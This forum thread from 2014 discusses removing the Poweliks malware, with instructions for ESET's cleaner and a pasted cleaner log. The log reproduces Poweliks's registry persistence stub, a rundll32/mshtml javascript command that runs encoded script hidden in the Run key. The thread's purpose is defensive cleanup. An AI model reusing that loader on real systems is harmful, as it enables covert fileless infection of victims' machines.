Rich-M Posted December 1, 2014 Posted December 1, 2014 From Ken Dwight's Newsletter (the Virus Doctor): An update on a new category of virus called Poweliks. This has become one of the most widespread pieces of malware in the past two months, and removing it is significantly different from anything we have faced before. Here is my latest update on it: Click here:Here Quote
starbuck Posted December 1, 2014 Posted December 1, 2014 He seems a little behind the times with that. The first solution I distributed involved use of RogueKiller, from Adlice Software. That procedure was effective, if a bit involved. I’ve heard, the Farbar Recovery Scan Tool is effective in finding and removing Poweliks infections. It is also the most confusing to use (for me, at least!), We've been using both these for some time now. Problems reading and understanding the reports will always happen when you try to use tools that you are not familiar with ( or trained in) ESET offers a free Poweliks removal tool, If anyone wants instructions: Please download Powelikscleaner (by ESET) and save it to your Desktop. Double-click ESETPoweliksCleaner.exe to start the tool. Read the terms of the End-user license agreement and click Agree if you agree to them. The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it. If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC. The tool will produce a log in the same directory the tool was run from. Please copy and paste the log in your next reply and the type of report you can expect: [2014.11.04 19:38:24.612] - Begin [2014.11.04 19:38:24.612] - [2014.11.04 19:38:24.612] - .................................... [2014.11.04 19:38:24.612] - ..::::::::::::::::::.................... [2014.11.04 19:38:24.612] - .::EEEEEE:::SSSSSS::..EEEEEE..TTTTTTTT.. Win32/Poweliks [2014.11.04 19:38:24.628] - .::EE::::EE:SS:::::::.EE....EE....TT...... Version: 1.0.0.1 [2014.11.04 19:38:24.628] - .::EEEEEEEE::SSSSSS::.EEEEEEEE....TT...... Built: Oct 15 2014 [2014.11.04 19:38:24.628] - .::EE:::::::::::::SS:.EE..........TT...... [2014.11.04 19:38:24.628] - .::EEEEEE:::SSSSSS::..EEEEEE.....TT..... Copyright © ESET, spol. s r.o. [2014.11.04 19:38:24.628] - ..::::::::::::::::::.................... 1992-2013. All rights reserved. [2014.11.04 19:38:24.628] - .................................... [2014.11.04 19:38:24.628] - [2014.11.04 19:38:24.628] - -------------------------------------------------------------------------------- [2014.11.04 19:38:24.628] - [2014.11.04 19:38:24.628] - INFO: OS: 6.1.7601 SP1 [2014.11.04 19:38:24.628] - INFO: Product Type: Workstation [2014.11.04 19:38:24.628] - INFO: WoW64: False [2014.11.04 19:38:24.628] - INFO: Machine guid: 5F2EDDFD-8FAD-42BF-B824-D1D940424289 [2014.11.04 19:38:24.628] - [2014.11.04 19:38:24.628] - INFO: Scanning for system infection... [2014.11.04 19:38:24.628] - -------------------------------------------------------------------------------- [2014.11.04 19:38:24.628] - [2014.11.04 19:38:24.628] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]... [2014.11.04 19:38:24.628] - WARNING: Found infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")' [2014.11.04 19:38:24.628] - WARNING: Found infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")' [2014.11.04 19:38:24.628] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]... [2014.11.04 19:38:24.628] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]... [2014.11.04 19:38:24.628] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]... [2014.11.04 19:38:24.628] - INFO: Processing classes... [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}] [2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}] [2014.11.04 19:38:24.628] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]... [2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:24.628] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]... [2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:24.628] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:24.628] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:24.628] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]... [2014.11.04 19:38:24.628] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]... [2014.11.04 19:38:24.628] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32] [2014.11.04 19:38:24.628] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32] [2014.11.04 19:38:24.628] - INFO: Win32/Poweliks found [2014.11.04 19:38:28.372] - INFO: process: dllhost.exe, pid 1020, parent 2340 [2014.11.04 19:38:28.372] - INFO: Terminated process pid = 1020 [2014.11.04 19:38:28.372] - INFO: process: dllhost.exe, pid 3588, parent 580 [2014.11.04 19:38:28.372] - INFO: process: dllhost.exe, pid 2128, parent 580 [2014.11.04 19:38:28.372] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]... [2014.11.04 19:38:28.372] - INFO: Deleted infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")' [2014.11.04 19:38:28.372] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]... [2014.11.04 19:38:28.388] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]... [2014.11.04 19:38:28.388] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]... [2014.11.04 19:38:28.388] - INFO: Processing classes... [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}] [2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}] [2014.11.04 19:38:28.388] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]... [2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:28.388] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]... [2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:28.388] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:28.388] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe] [2014.11.04 19:38:28.388] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]... [2014.11.04 19:38:28.388] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]... [2014.11.04 19:38:28.388] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32] [2014.11.04 19:38:28.388] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32] [2014.11.04 19:38:28.388] - INFO: Cleaning status: 0 [2014.11.04 19:38:30.837] - End 2 Quote
Rich-M Posted December 1, 2014 Author Posted December 1, 2014 I honestly cannot figure our Farbar either though Rogue Killer I use all the time.... Quote
starbuck Posted December 2, 2014 Posted December 2, 2014 I honestly cannot figure our Farbar either Mmm so while you can't understand it.... I get to keep my job.:big_ha: To be fair, FRST has been around for 4 years now and obviously i have followed the development. It easier to understand when you follow something from the beginning.... all the changes are gradual. Coming in now and trying to follow the tutorial is a bit heavy going. Quote
Rich-M Posted December 2, 2014 Author Posted December 2, 2014 Yep Pete your job is definitely safe with me! Quote
IceMan37 Posted January 4, 2015 Posted January 4, 2015 Just ran the poweliks tool no threat found. Quote
Rich-M Posted January 4, 2015 Author Posted January 4, 2015 I run that on every system I look at and never find anything there. Quote
starbuck Posted January 4, 2015 Posted January 4, 2015 In the last 3 months or so, i've only ever come across this infection once. This has become one of the most widespread pieces of malware in the past two months I think that quote is a bit of an over statement. Quote
Rich-M Posted January 4, 2015 Author Posted January 4, 2015 I'll say. I should check the date on that newsletter as I am not sure it was current. He may have been forwarding some to me to catch up now that I think about it. Quote
Recommended Posts